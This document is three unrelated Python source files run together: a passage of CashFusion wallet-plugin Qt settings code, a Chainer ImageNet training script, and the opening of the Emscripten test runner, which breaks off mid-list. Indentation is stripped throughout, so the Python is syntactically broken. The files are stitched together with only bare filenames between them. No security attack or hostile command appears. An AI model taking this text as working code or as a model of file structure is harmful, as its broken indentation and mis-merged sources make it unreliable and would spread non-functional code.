lbl = QLabel(_("Allow this wallet to participate multiply in the same fusion round?"))
lbl.setWordWrap(True)
slayout.addWidget(lbl)
box = QHBoxLayout(); box.setContentsMargins(0,0,0,0)
self.combo_self_fuse = QComboBox()
self.combo_self_fuse.addItem(_('No'), 1)
self.combo_self_fuse.addItem(_('Yes - as up to two players'), 2)
box.addStretch(1)
box.addWidget(self.combo_self_fuse)
slayout.addLayout(box) ; del box
self.combo_self_fuse.activated.connect(self.chose_self_fuse)
self.stacked_layout = stacked_layout = QStackedLayout()
main_layout.addLayout(stacked_layout)
# Stacked Layout pages ...
# Normal
normal_page_w = QWidget()
normal_page_layout = QVBoxLayout(normal_page_w)
self.confkey2idx['normal'] = stacked_layout.addWidget(normal_page_w)
mode_cb.addItem(_('Normal'))
lbl = QLabel("- " + _("Normal mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
normal_page_layout.addWidget(lbl)
# Consolidate
consolidate_page_w = QWidget()
consolidate_page_layout = QVBoxLayout(consolidate_page_w)
self.confkey2idx['consolidate'] = stacked_layout.addWidget(consolidate_page_w)
mode_cb.addItem(_('Consolidate'))
lbl = QLabel("- " + _("Consolidation mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
consolidate_page_layout.addWidget(lbl)
# Fan-out
fanout_page_w = QWidget()
fanout_page_layout = QVBoxLayout(fanout_page_w)
self.confkey2idx['fan-out'] = stacked_layout.addWidget(fanout_page_w)
mode_cb.addItem(_('Fan-out'))
lbl = QLabel("- " + _("Fan-out mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
fanout_page_layout.addWidget(lbl)
# Custom
self.custom_page_w = custom_page_w = QWidget()
custom_page_layout = QVBoxLayout(custom_page_w)
custom_page_layout.setContentsMargins(0,0,0,0)
self.confkey2idx['custom'] = stacked_layout.addWidget(custom_page_w)
mode_cb.addItem(_('Custom'))
mode_cb.currentIndexChanged.connect(self._on_mode_changed) # intentionally connected after all items already added
box = QGroupBox(_("Auto-Fusion Coin Selection")) ; custom_page_layout.addWidget(box)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
self.radio_select_size = QRadioButton(_("Target typical output amount"))
grid.addWidget(self.radio_select_size, 0, 0)
self.radio_select_fraction = QRadioButton(_("Per-coin random chance"))
grid.addWidget(self.radio_select_fraction, 1, 0)
self.radio_select_count = QRadioButton(_("Target number of coins in wallet"))
grid.addWidget(self.radio_select_count, 2, 0)
self.radio_select_size.clicked.connect(self.edited_size)
self.radio_select_fraction.clicked.connect(self.edited_fraction)
self.radio_select_count.clicked.connect(self.edited_count)
self.amt_selector_size = BTCAmountEdit(main_window.get_decimal_point)
grid.addWidget(self.amt_selector_size, 0, 1)
self.sb_selector_fraction = QDoubleSpinBox()
self.sb_selector_fraction.setRange(0.1, 100.)
self.sb_selector_fraction.setSuffix("%")
self.sb_selector_fraction.setDecimals(1)
grid.addWidget(self.sb_selector_fraction, 1, 1)
self.sb_selector_count = QSpinBox()
self.sb_selector_count.setRange(COIN_FRACTION_FUDGE_FACTOR, 9999) # Somewhat hardcoded limit of 9999 is arbitrary, have this come from constants?
grid.addWidget(self.sb_selector_count, 2, 1)
self.amt_selector_size.editingFinished.connect(self.edited_size)
self.sb_selector_fraction.valueChanged.connect(self.edited_fraction)
self.sb_selector_count.valueChanged.connect(self.edited_count)
# Clicking the radio button should bring its corresponding widget buddy into focus
self.radio_select_size.clicked.connect(self.amt_selector_size.setFocus)
self.radio_select_fraction.clicked.connect(self.sb_selector_fraction.setFocus)
self.radio_select_count.clicked.connect(self.sb_selector_count.setFocus)
low_warn_blurb = _("Are you trying to consolidate?")
low_warn_tooltip = _("Click for consolidation tips")
low_warn_blurb_link = '<a href="unused">' + low_warn_blurb + '</a>'
self.l_warn_selection = QLabel("<center>" + low_warn_blurb_link + "</center>")
self.l_warn_selection.setToolTip(low_warn_tooltip)
self.l_warn_selection.linkActivated.connect(self._show_low_warn_help)
self.l_warn_selection.setAlignment(Qt.AlignJustify|Qt.AlignVCenter)
qs = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
qs.setRetainSizeWhenHidden(True)
self.l_warn_selection.setSizePolicy(qs)
slayout.addWidget(self.l_warn_selection)
slayout.setAlignment(self.l_warn_selection, Qt.AlignCenter)
box = QGroupBox(_("Auto-Fusion Limits")) ; custom_page_layout.addWidget(box)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
grid.addWidget(QLabel(_("Number of queued fusions")), 0, 0)
self.sb_queued_autofuse = QSpinBox()
self.sb_queued_autofuse.setRange(1, 10) # hard-coded range 1-10, maybe have this come from some constants?
self.sb_queued_autofuse.setMinimumWidth(50) # just so it doesn't end up too tiny
grid.addWidget(self.sb_queued_autofuse, 0, 1)
self.cb_autofuse_only_all_confirmed = QCheckBox(_("Only auto-fuse when all coins are confirmed"))
slayout.addWidget(self.cb_autofuse_only_all_confirmed)
grid.addWidget(QWidget(), 0, 2); grid.setColumnStretch(2, 1) # spacer
self.sb_queued_autofuse.valueChanged.connect(self.edited_queued_autofuse)
self.cb_autofuse_only_all_confirmed.clicked.connect(self.clicked_confirmed_only)
# / end pages
cbut = CloseButton(self)
main_layout.addLayout(Buttons(cbut))
cbut.setDefault(False)
cbut.setAutoDefault(False)
self.idx2confkey = inv_dict(self.confkey2idx) # This must be set-up before this function returns
# We do this here in addition to in showEvent because on some platforms
# (such as macOS), the window animates-in before refreshing properly and
# then it refreshes, leading to a jumpy glitch. If we do this, it
# slides-in already looking as it should.
self.refresh()
def _show_low_warn_help(self):
low_warn_message = (
_("If you wish to consolidate coins:")
+ "<ul>"
+ "<li>" + _("Specify a maximum of 1 queued fusion")
+ "<li>" + _("Set 'self-fusing' to 'No'")
+ "<li>" + _("Check the 'only when all coins are confirmed' checkbox")
+ "</ul>"
+ _("If you do not wish to necessarily consolidate coins, then it's"
" perfectly acceptable to ignore this tip.")
)
self.show_message(low_warn_message, title=_('Help'), rich_text=True)
def _on_mode_changed(self, idx : int):
self.conf.fusion_mode = self.idx2confkey[idx] # will raise on bad idx, which indicates programming error.
self.refresh()
def _on_cb_coinbase(self, checked : bool):
self.conf.autofuse_coinbase = checked
self.refresh()
def _maybe_switch_page(self):
mode = self.conf.fusion_mode
oldidx = self.stacked_layout.currentIndex()
try:
idx = self.confkey2idx[mode]
idx_custom = self.confkey2idx['custom']
# The below conditional ensures that the custom page always
# disappears from the layout if not selected. We do this because it
# is rather large and makes this window unnecessarily big. Note this
# only works if the 'custom' page is last.. otherwise bad things
# happen!
assert idx_custom == max(self.confkey2idx.values()) # ensures custom is last page otherwise this code breaks
if idx == idx_custom:
if not self.stacked_layout.itemAt(idx_custom):
self.stacked_layout.insertWidget(idx_custom, self.custom_page_w)
elif self.stacked_layout.count()-1 == idx_custom:
self.stacked_layout.takeAt(idx_custom)
self.stacked_layout.setCurrentIndex(idx)
self.mode_cb.setCurrentIndex(idx)
except KeyError as e:
# should never happen because settings object filters out unknown modes
raise RuntimeError(f"INTERNAL ERROR: Unknown fusion mode: '{mode}'") from e
self.updateGeometry()
self.resize(self.sizeHint())
return idx == idx_custom
def refresh(self):
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(self.wallet)
select_type, select_amount = self.conf.selector
edit_widgets = [self.amt_selector_size, self.sb_selector_fraction, self.sb_selector_count, self.sb_queued_autofuse,
self.cb_autofuse_only_all_confirmed, self.combo_self_fuse, self.stacked_layout, self.mode_cb,
self.cb_coinbase]
try:
for w in edit_widgets:
# Block spurious editingFinished signals and valueChanged signals as
# we modify the state and focus of widgets programmatically below.
# On macOS not doing this led to a very strange/spazzy UI.
w.blockSignals(True)
self.cb_coinbase.setChecked(self.conf.autofuse_coinbase)
if not self.gb_coinbase.isVisible():
cb_latch = self.conf.coinbase_seen_latch
if cb_latch or self.cb_coinbase.isChecked() or has_coinbase:
if not cb_latch:
# Once latched to true, this UI element will forever be
# visible for this wallet. It means the wallet is a miner's
# wallet and they care about coinbase coins.
self.conf.coinbase_seen_latch = True
self.gb_coinbase.setHidden(False)
del cb_latch
is_custom_page = self._maybe_switch_page()
idx = 0
if self.conf.self_fuse_players > 1:
idx = 1
self.combo_self_fuse.setCurrentIndex(idx)
del idx
if is_custom_page:
self.amt_selector_size.setEnabled(select_type == 'size')
self.sb_selector_count.setEnabled(select_type == 'count')
self.sb_selector_fraction.setEnabled(select_type == 'fraction')
if select_type == 'size':
self.radio_select_size.setChecked(True)
sel_size = select_amount
if sum_value > 0:
sel_fraction = min(COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value, 1.)
else:
sel_fraction = 1.
elif select_type == 'count':
self.radio_select_count.setChecked(True)
sel_size = max(sum_value / max(select_amount, 1), 10000)
sel_fraction = COIN_FRACTION_FUDGE_FACTOR / max(select_amount, 1)
elif select_type == 'fraction':
self.radio_select_fraction.setChecked(True)
sel_size = max(sum_value * select_amount / COIN_FRACTION_FUDGE_FACTOR, 10000)
sel_fraction = select_amount
else:
self.conf.selector = None
return self.refresh()
sel_count = COIN_FRACTION_FUDGE_FACTOR / max(sel_fraction, 0.001)
self.amt_selector_size.setAmount(round(sel_size))
self.sb_selector_fraction.setValue(max(min(sel_fraction, 1.0), 0.001) * 100.0)
self.sb_selector_count.setValue(sel_count)
try: self.sb_queued_autofuse.setValue(self.conf.queued_autofuse)
except (TypeError, ValueError): pass # should never happen but paranoia pays off in the long-term
conf_only = self.conf.autofuse_confirmed_only
self.cb_autofuse_only_all_confirmed.setChecked(conf_only)
self.l_warn_selection.setVisible(sel_fraction > 0.2 and (not conf_only or self.sb_queued_autofuse.value() > 1))
finally:
# re-enable signals
for w in edit_widgets: w.blockSignals(False)
def edited_size(self,):
size = self.amt_selector_size.get_amount()
if size is None or size < 10000:
size = 10000
self.conf.selector = ('size', size)
self.refresh()
def edited_fraction(self,):
fraction = max(self.sb_selector_fraction.value() / 100., 0.0)
self.conf.selector = ('fraction', round(fraction, 3))
self.refresh()
def edited_count(self,):
count = self.sb_selector_count.value()
self.conf.selector = ('count', count)
self.refresh()
def edited_queued_autofuse(self,):
prevval = self.conf.queued_autofuse
numfuse = self.sb_queued_autofuse.value()
self.conf.queued_autofuse = numfuse
if prevval > numfuse:
for f in list(self.wallet._fusions_auto):
f.stop('User decreased queued-fuse limit', not_if_running = True)
self.refresh()
def clicked_confirmed_only(self, checked):
self.conf.autofuse_confirmed_only = checked
self.refresh()
def chose_self_fuse(self,):
sel = self.combo_self_fuse.currentData()
oldsel = self.conf.self_fuse_players
if oldsel != sel:
self.conf.self_fuse_players = sel
for f in self.wallet._fusions:
# we have to stop waiting fusions since the tags won't overlap.
# otherwise, the user will end up self fusing way too much.
f.stop('User changed self-fuse limit', not_if_running = True)
self.refresh()
def closeEvent(self, event):
super().closeEvent(event)
if event.isAccepted():
self.setParent(None)
del self.wallet._cashfusion_settings_window
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted():
self.refresh()
class ServerFusionsBaseMixin:
def __init__(self, plugin, refresh_interval=2000):
assert isinstance(self, QWidget)
self.plugin = plugin
self.refresh_interval = refresh_interval
self.timer_refresh = QTimer(self)
self.timer_refresh.setSingleShot(False)
self.timer_refresh.timeout.connect(self.refresh)
def _on_show(self):
self.timer_refresh.start(self.refresh_interval)
self.refresh()
def _on_hide(self):
self.timer_refresh.stop()
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted():
self._on_show()
def hideEvent(self, event):
super().hideEvent(event)
if event.isAccepted():
self._on_hide()
def closeEvent(self, event):
super().closeEvent(event)
if event.isAccepted():
self._on_hide()
def refresh(self):
raise NotImplementedError('ServerFusionsBaseMixin refresh() needs an implementation')
class ServerWidget(ServerFusionsBaseMixin, QWidget):
def __init__(self, plugin, parent=None):
QWidget.__init__(self, parent)
ServerFusionsBaseMixin.__init__(self, plugin)
main_layout = QVBoxLayout(self)
self.serverbox = QGroupBox(_("Server"))
main_layout.addWidget(self.serverbox)
#self.serverbox.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
slayout = QVBoxLayout(self.serverbox)
self.l_server_status = QLabel()
slayout.addWidget(self.l_server_status)
self.t_server_waiting = QTableWidget()
self.t_server_waiting.setColumnCount(3)
self.t_server_waiting.setRowCount(len(Params.tiers))
self.t_server_waiting.setHorizontalHeaderLabels([_('Tier (sats)'), _('Num players'), ''])
for i, t in enumerate(Params.tiers):
button = QPushButton(_("Start"))
button.setDefault(False); button.setAutoDefault(False) # on some platforms if we don't do this, one of the buttons traps "Enter" key
button.clicked.connect(partial(self.clicked_start_fuse, t))
self.t_server_waiting.setCellWidget(i, 2, button)
slayout.addWidget(self.t_server_waiting)
def sizeHint(self):
return QSize(300, 150)
def refresh(self):
if self.is_server_running():
self.t_server_waiting.setEnabled(True)
self.l_server_status.setText(_('Server status: ACTIVE') + f' {self.plugin.fusion_server.host}:{self.plugin.fusion_server.port}')
table = self.t_server_waiting
table.setRowCount(len(self.plugin.fusion_server.waiting_pools))
for i,(t,pool) in enumerate(self.plugin.fusion_server.waiting_pools.items()):
table.setItem(i,0,QTableWidgetItem(str(t)))
table.setItem(i,1,QTableWidgetItem(str(len(pool.pool))))
else:
self.t_server_waiting.setEnabled(False)
self.l_server_status.setText(_('Server status: NOT RUNNING'))
def is_server_running(self):
return bool(self.plugin.fusion_server)
def clicked_start_fuse(self, tier, event):
if self.plugin.fusion_server is None:
return
self.plugin.fusion_server.start_fuse(tier)
class FusionsWindow(ServerFusionsBaseMixin, QDialog):
def __init__(self, plugin):
QDialog.__init__(self, parent=None)
ServerFusionsBaseMixin.__init__(self, plugin, refresh_interval=1000)
self.setWindowTitle(_("CashFusion - Fusions"))
self.setWindowIcon(icon_fusion_logo)
main_layout = QVBoxLayout(self)
clientbox = QGroupBox(_("Fusions"))
main_layout.addWidget(clientbox)
clayout = QVBoxLayout(clientbox)
self.t_active_fusions = QTreeWidget()
self.t_active_fusions.setHeaderLabels([_('Wallet'), _('Status'), _('Status Extra')])
self.t_active_fusions.setContextMenuPolicy(Qt.CustomContextMenu)
self.t_active_fusions.customContextMenuRequested.connect(self.create_menu_active_fusions)
self.t_active_fusions.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.t_active_fusions.itemDoubleClicked.connect(self.on_double_clicked)
clayout.addWidget(self.t_active_fusions)
self.resize(520, 240) # TODO: Have this somehow not be hard-coded
def refresh(self):
tree = self.t_active_fusions
reselect_fusions = set(i.data(0, Qt.UserRole)() for i in tree.selectedItems())
reselect_fusions.discard(None)
reselect_items = []
tree.clear()
for fusion in reversed(self.plugin.get_all_fusions()):
wname = fusion.target_wallet.diagnostic_name()
status, status_ext = fusion.status
item = QTreeWidgetItem( [ wname, status, status_ext] )
item.setToolTip(0, wname) # this doesn't always fit in the column
item.setToolTip(2, status_ext or '') # neither does this
item.setData(0, Qt.UserRole, weakref.ref(fusion))
if fusion in reselect_fusions:
reselect_items.append(item)
tree.addTopLevelItem(item)
for item in reselect_items:
item.setSelected(True)
def create_menu_active_fusions(self, position):
selected = self.t_active_fusions.selectedItems()
if not selected:
return
fusions = set(i.data(0, Qt.UserRole)() for i in selected)
fusions.discard(None)
statuses = set(f.status[0] for f in fusions)
selection_of_1_fusion = list(fusions)[0] if len(fusions) == 1 else None
has_live = 'running' in statuses or 'waiting' in statuses
menu = QMenu()
def cancel():
for fusion in fusions:
fusion.stop(_('Stop requested by user'))
if has_live:
if 'running' in statuses:
msg = _('Cancel (at end of round)')
else:
msg = _('Cancel')
menu.addAction(msg, cancel)
if selection_of_1_fusion and selection_of_1_fusion.txid:
menu.addAction(_("View Tx..."), lambda: self._open_tx_for_fusion(selection_of_1_fusion))
if not menu.isEmpty():
menu.exec_(self.t_active_fusions.viewport().mapToGlobal(position))
def on_double_clicked(self, item, column):
self._open_tx_for_fusion( item.data(0, Qt.UserRole)() )
def _open_tx_for_fusion(self, fusion):
if not fusion or not fusion.txid or not fusion.target_wallet:
return
wallet = fusion.target_wallet
window = wallet.weak_window and wallet.weak_window()
txid = fusion.txid
if window:
tx = window.wallet.transactions.get(txid)
if tx:
window.show_transaction(tx, wallet.get_label(txid))
else:
window.show_error(_("Transaction not yet in wallet"))
train_imagenet.py
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of the ILSVRC2012 training and
validation images and scale them to 256x256, then make two list files of space-
separated pairs whose first column is the full path to an image and whose second
column is the zero-origin label (the same format used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
from chainer import computational_graph as c
from chainer import cuda
from chainer import optimizers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
args = parser.parse_args()
assert 50000 % args.val_batchsize == 0
# Prepare dataset
def load_image_list(path):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((pair[0], np.int32(pair[1])))
return tuples
train_list = load_image_list(args.train)
val_list = load_image_list(args.val)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.init(args.gpu)
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model.collect_parameters())
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
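# Rough sketch of the queue protocol used by the three threads below:
# data_q carries the mode markers 'train' / 'val', (x_batch, y_batch) ndarray
# pairs, and finally 'end'; res_q echoes the mode markers back and carries
# (loss, accuracy) pairs from the trainer to the logger, ending with 'end'.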
# Data loading routine
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
top = left = cropwidth // 2  # integer division keeps the crop offsets valid indices
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
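# Example (assuming model.insize were 224): cropwidth would be 32, so a random
# 224x224 window is cut out of the 256x256 input (the centered window when
# center=True), mean-subtracted, scaled to [0, 1] and optionally flipped.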
# Data feeder
epoch_count=0
def feed_data():
global epoch_count
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
epoch_count=epoch
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 100000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
# Logger
def log_result():
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 10 == 0:
mean_loss = train_cur_loss / 10
mean_error = 1 - train_cur_accuracy / 10
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count // args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
# Trainer
def train_loop():
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
train = False
continue
x, y = inp
if args.gpu >= 0:
x = cuda.to_gpu(x)
y = cuda.to_gpu(y)
if train:
optimizer.zero_grads()
loss, accuracy = model.forward(x, y)
loss.backward()
optimizer.update()
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), False).dump())
with open('graph.wo_split.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), True).dump())
print('generated graph')
graph_generated = True
else:
loss, accuracy = model.forward(x, y, train=False)
pickle.dump(model, open('model%04d'%epoch_count, 'wb'), -1)
res_q.put((float(cuda.to_cpu(loss.data)),
float(cuda.to_cpu(accuracy.data))))
del loss, accuracy, x, y
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
pickle.dump(model, open('model', 'wb'), -1)
runner.py
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, to_cc, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# Also support the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# Generally JS engines are equivalent and testing one is enough. Set this to
# force testing on all JS engines, which is useful for finding JS engine bugs.
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
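# Usage sketch (illustrative): skip_if is normally applied through the helper
# decorators defined below, e.g.
#
#   @no_wasm_backend('relies on fastcomp-only behaviour')
#   def test_example(self):   # hypothetical test
#       ...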
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Setting a value to None means clearing that environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
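# Usage sketch (hypothetical values): variables mapped to None are cleared for
# the duration of the decorated test, everything else is set verbatim.
#
#   @with_env_modify({'EMCC_DEBUG': '1', 'EM_SAVE_DIR': None})
#   def test_example(self):
#       ...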
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
]
if shared.Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
